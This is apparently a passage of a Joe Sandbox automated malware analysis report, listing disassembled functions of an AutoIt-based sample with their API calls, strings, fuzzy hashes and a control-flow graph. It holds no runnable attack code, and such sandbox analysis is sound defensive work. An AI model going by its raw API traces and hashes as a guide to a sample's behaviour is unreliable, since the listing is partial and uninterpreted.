                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                      • API String ID: 0-572801152
                                                                                                                      • Opcode ID: 9c6b424a811ec7d5a307d643d02a62f1328652ac3f58c58e9272779cd6d04d69
                                                                                                                      • Instruction ID: 215732849063ac17846e4796666bc6b757fa51aaa155a524b83f7083d726e09b
                                                                                                                      • Opcode Fuzzy Hash: 9c6b424a811ec7d5a307d643d02a62f1328652ac3f58c58e9272779cd6d04d69
                                                                                                                      • Instruction Fuzzy Hash: EAE1B171A9021DABCF12DF64DA81BBE77B9FF48314F154029FA45AB281D770AD41CB90
                                                                                                                      Function 003FBF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1696 3fbf80-3fbfe1 call 3c1970 1699 3fc21b-3fc21d 1696->1699 1700 3fbfe7-3fbfeb 1696->1700 1701 3fc21e-3fc21f 1699->1701 1700->1699 1702 3fbff1-3fbff6 1700->1702 1703 3fc224-3fc226 1701->1703 1702->1699 1704 3fbffc-3fc00b call 3ebe14 1702->1704 1705 3fc227 1703->1705 1709 3fc158-3fc15c 1704->1709 1710 3fc011-3fc015 1704->1710 1708 3fc229 call 3fc235 1705->1708 1716 3fc22e-3fc232 1708->1716 1714 3fc15e-3fc160 1709->1714 1715 3fc16d 1709->1715 1712 3fc01b 1710->1712 1713 3fc017-3fc019 1710->1713 1717 3fc01d-3fc01f 1712->1717 1713->1717 1718 3fc16f-3fc171 1714->1718 1715->1718 1719 3fc033-3fc03e 1717->1719 1720 3fc021-3fc025 1717->1720 1718->1701 1721 3fc177-3fc17b 1718->1721 1719->1705 1720->1719 1724 3fc027-3fc031 1720->1724 1722 3fc17d-3fc17f 1721->1722 1723 3fc181 1721->1723 1725 3fc183-3fc186 1722->1725 1723->1725 1724->1719 1726 3fc043-3fc05f 1724->1726 1727 3fc188-3fc18e 1725->1727 1728 3fc193-3fc197 1725->1728 1733 3fc067-3fc081 1726->1733 1734 3fc061-3fc065 1726->1734 1727->1703 1729 3fc19d 1728->1729 1730 3fc199-3fc19b 1728->1730 1732 3fc19f-3fc1c9 VariantInit VariantClear 1729->1732 1730->1732 1740 3fc1cb-3fc1cd 1732->1740 1741 3fc1e6-3fc1ea 1732->1741 1742 3fc089 1733->1742 1743 3fc083-3fc087 1733->1743 1734->1733 1735 3fc090-3fc0e5 call 3bfa89 VariantInit call 3c1a00 1734->1735 1758 3fc108-3fc10d 1735->1758 1759 3fc0e7-3fc0f1 1735->1759 1740->1741 1744 3fc1cf-3fc1e1 call 3b2570 1740->1744 1745 3fc1ec-3fc1ee 1741->1745 1746 3fc1f0-3fc1fe call 3b2570 1741->1746 1742->1735 1743->1735 1743->1742 1757 3fc0fb-3fc0fe 1744->1757 1745->1746 1747 3fc201-3fc219 call 3ea6f6 VariantClear 1745->1747 1746->1747 1747->1716 1757->1708 1762 3fc10f-3fc131 1758->1762 1763 3fc162-3fc16b 1758->1763 1760 3fc103-3fc106 1759->1760 1761 3fc0f3-3fc0fa 1759->1761 1760->1757 1761->1757 1766 3fc13b-3fc13d 1762->1766 1767 3fc133-3fc139 1762->1767 1763->1757 1768 3fc141-3fc157 call 3ea6f6 1766->1768 1767->1757 1768->1709
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$_memset
                                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                      • API String ID: 2862541840-625585964
                                                                                                                      • Opcode ID: b2e529837b962eb15c9909862e6abb672f4c1d39e14d16a28c4a6ebee9319458
                                                                                                                      • Instruction ID: 4138d0a458d0663936bc31cab2d38f467e7656b8fe459de029f7ef773ba45622
                                                                                                                      • Opcode Fuzzy Hash: b2e529837b962eb15c9909862e6abb672f4c1d39e14d16a28c4a6ebee9319458
                                                                                                                      • Instruction Fuzzy Hash: 4C91DE71A5021DABCF25CFA4CD44FAEBBB8EF45710F10851AFA05AB281D7709941CFA0
                                                                                                                      Function 003A3DCB Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 258COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A3F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003A34E2,?,00000001), ref: 003A3FCD
                                                                                                                      • _free.LIBCMT ref: 00413C27
                                                                                                                      • _free.LIBCMT ref: 00413C6E
                                                                                                                        • Part of subcall function 003ABDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,004622E8,?,00000000,?,003A3E2E,?,00000000,?,0043DBF0,00000000,?), ref: 003ABE8B
                                                                                                                        • Part of subcall function 003ABDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,003A3E2E,?,00000000,?,0043DBF0,00000000,?,00000002), ref: 003ABEA7
                                                                                                                        • Part of subcall function 003ABDF0: __wsplitpath.LIBCMT ref: 003ABF19
                                                                                                                        • Part of subcall function 003ABDF0: _wcscpy.LIBCMT ref: 003ABF31
                                                                                                                        • Part of subcall function 003ABDF0: _wcscat.LIBCMT ref: 003ABF46
                                                                                                                        • Part of subcall function 003ABDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 003ABF56
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<:$G-:
                                                                                                                      • API String ID: 1510338132-1330228751
                                                                                                                      • Opcode ID: de16f7df7be2693e896e85e9644075c36464753de5c10faf4ffef2a7d8bead06
                                                                                                                      • Instruction ID: 3b35ac2562f1b521684680e41e2cd30ef221e6dfab3afca0984f9edbb0f2cf29
                                                                                                                      • Opcode Fuzzy Hash: de16f7df7be2693e896e85e9644075c36464753de5c10faf4ffef2a7d8bead06
                                                                                                                      • Instruction Fuzzy Hash: 26917D71A10269AFCF05EFA4CC919EEB7B4FF09310F14412AF416AB291EB34AE45CB54
                                                                                                                      Function 003BEB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,003BEADA,?,?), ref: 003BEB27
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,003BEADA,?,?), ref: 00414B26
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,003BEADA,?,?), ref: 00414B65
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,003BEADA,?,?), ref: 00414B94
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: QueryValue$CloseOpen
                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                      • API String ID: 1586453840-614718249
                                                                                                                      • Opcode ID: b3faf6aa347831a594c2fe4ff94893a62b6021bf66ac25ab3605270ddea41d56
                                                                                                                      • Instruction ID: 120736ad86adb9214712ff5f1b0703ff4ec4feb06042794e5895a477ce712be7
                                                                                                                      • Opcode Fuzzy Hash: b3faf6aa347831a594c2fe4ff94893a62b6021bf66ac25ab3605270ddea41d56
                                                                                                                      • Instruction Fuzzy Hash: 8E11AF71A04108BEEB05DFA4DC8AEFF77BCEF04348F101029B506E61A0EAB0AE01DB54
                                                                                                                      Function 003A2E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003A2ECB
                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003A2EEC
                                                                                                                      • ShowWindow.USER32(00000000), ref: 003A2F00
                                                                                                                      • ShowWindow.USER32(00000000), ref: 003A2F09
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CreateShow
                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                      • Opcode ID: b1d08ca847d6863ea74d82a8ce0992f726e1e7906b1ee5b333fe96ea9fa4c5e1
                                                                                                                      • Instruction ID: 939ed94136c899f86f71b11626c5ad1ee87b3df254a1708cab618ecffaa50566
                                                                                                                      • Opcode Fuzzy Hash: b1d08ca847d6863ea74d82a8ce0992f726e1e7906b1ee5b333fe96ea9fa4c5e1
                                                                                                                      • Instruction Fuzzy Hash: 51F03070A402D07ADB3057536C48E672E7DD7C6F20F05402FF90492170D1A50881DA79
                                                                                                                      Function 003E6D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A3B1E: _wcsncpy.LIBCMT ref: 003A3B32
                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 003E6DBA
                                                                                                                      • GetLastError.KERNEL32 ref: 003E6DC5
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 003E6DD9
                                                                                                                      • _wcsrchr.LIBCMT ref: 003E6DFB
                                                                                                                        • Part of subcall function 003E6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 003E6E31
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3633006590-0
                                                                                                                      • Opcode ID: 1ef3b8c9c0c94c957cf54ea648c77c30100cba0482c8962baeba5b4cb866d2db
                                                                                                                      • Instruction ID: 171e6bef931ece6e6b08cbc632e1ee25f08aeb2f310912da5d0cb920f814e5d3
                                                                                                                      • Opcode Fuzzy Hash: 1ef3b8c9c0c94c957cf54ea648c77c30100cba0482c8962baeba5b4cb866d2db
                                                                                                                      • Instruction Fuzzy Hash: 03210535A003649ADB267775ED4BBEB33ACCF21390F600369E421C70D2EB20CE848654
                                                                                                                      Function 003F9122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003FACD3: inet_addr.WS2_32(00000000), ref: 003FACF5
                                                                                                                      • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 003F9160
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F916F
                                                                                                                      • connect.WS2_32(00000000,?,00000010), ref: 003F918B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3701255441-0
                                                                                                                      • Opcode ID: 9a60adb4d44e147df45f2f5b543f627bcfe437a8adc824a4f691a94a3abafbfc
                                                                                                                      • Instruction ID: 958104c4f9d11c7a9b3b5257407985a9b5df38e219310b6ff0fc95f72233cde3
                                                                                                                      • Opcode Fuzzy Hash: 9a60adb4d44e147df45f2f5b543f627bcfe437a8adc824a4f691a94a3abafbfc
                                                                                                                      • Instruction Fuzzy Hash: E32181317006159FDB11AF68CC89B7EB7A9EF89724F04452AFA169B3D1CB74AC018751
                                                                                                                      Function 003FF79F Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 385COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: dEE
                                                                                                                      • API String ID: 0-992457905
                                                                                                                      • Opcode ID: 3528f08fcae552b9d6cafb7384e7f6076e0b9ff0457012cf39b9b0432e8dbe1b
                                                                                                                      • Instruction ID: 0e5a61cc52c769ad7bea6c79d78b15cdfed1b129b95b712760aaa3a0e7d29033
                                                                                                                      • Opcode Fuzzy Hash: 3528f08fcae552b9d6cafb7384e7f6076e0b9ff0457012cf39b9b0432e8dbe1b
                                                                                                                      • Instruction Fuzzy Hash: 3DF18B716087059FCB11DF24C980B6AB7E5FF88314F10892EFA999B292D771E945CF82
                                                                                                                      Function 003A3A67 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SHGetMalloc.SHELL32(1<:), ref: 003A3A7D
                                                                                                                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 003A3AD2
                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 003A3A8F
                                                                                                                        • Part of subcall function 003A3B1E: _wcsncpy.LIBCMT ref: 003A3B32
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                      • String ID: 1<:
                                                                                                                      • API String ID: 3981382179-1863841528
                                                                                                                      • Opcode ID: 1733fd89b04171574d7ded8924ddda436a2e0c9acbd82d3edf172d6dc6902edd
                                                                                                                      • Instruction ID: ad10bd30a07e5c6580525708bb1aa8db9a3939d1e2e9954dc953e78573d96197
                                                                                                                      • Opcode Fuzzy Hash: 1733fd89b04171574d7ded8924ddda436a2e0c9acbd82d3edf172d6dc6902edd
                                                                                                                      • Instruction Fuzzy Hash: D6218076B00114ABCB15DF95DC84DEEB7BEEF89740B1040A4F50ADB250DB309E46CBA4
                                                                                                                      Function 003BC955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003BC948,SwapMouseButtons,00000004,?), ref: 003BC979
                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,003BC948,SwapMouseButtons,00000004,?,?,?,?,003BBF22), ref: 003BC99A
                                                                                                                      • RegCloseKey.KERNEL32(00000000,?,?,003BC948,SwapMouseButtons,00000004,?,?,?,?,003BBF22), ref: 003BC9BC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                      • Opcode ID: 6ff8c0fd62d2ea49fa45b7e5cdb546d1d9dff34530b4321ddd8e3e94dd08a398
                                                                                                                      • Instruction ID: 16bad3c1c3a2c3c5d651745d6dff09722fa6ec99d4a508f61346881ca3e362d7
                                                                                                                      • Opcode Fuzzy Hash: 6ff8c0fd62d2ea49fa45b7e5cdb546d1d9dff34530b4321ddd8e3e94dd08a398
                                                                                                                      • Instruction Fuzzy Hash: 33117C75A21208BFEB228F64DC44EEF77BCEF05748F10542AAA41E7210D7319E419B64
                                                                                                                      Function 003DA8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 18d0f5e15dcb73a10e20948b49b47a229685873807d69127e49a2967a0c0ed1e
                                                                                                                      • Instruction ID: 56eb58433bf834226fce239e3299852058d797d50e8b595e1e08b1575e061e71
                                                                                                                      • Opcode Fuzzy Hash: 18d0f5e15dcb73a10e20948b49b47a229685873807d69127e49a2967a0c0ed1e
                                                                                                                      • Instruction Fuzzy Hash: AEC17076A0061AEFCB16CFA4DA94EAEB7B5FF48700F11459AE801AB351D730DE41CB91
                                                                                                                      Function 003A131C Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A16F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 003A1751
                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003A159B
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 003A1612
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004158F7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                      • String ID: '/>
                                                                                                                      • API String ID: 458326420-289320113
                                                                                                                      • Opcode ID: 25a011ee67ae7e35b776bd61167ac08c68c6123b8c96e7538d5cba86b25bdb6f
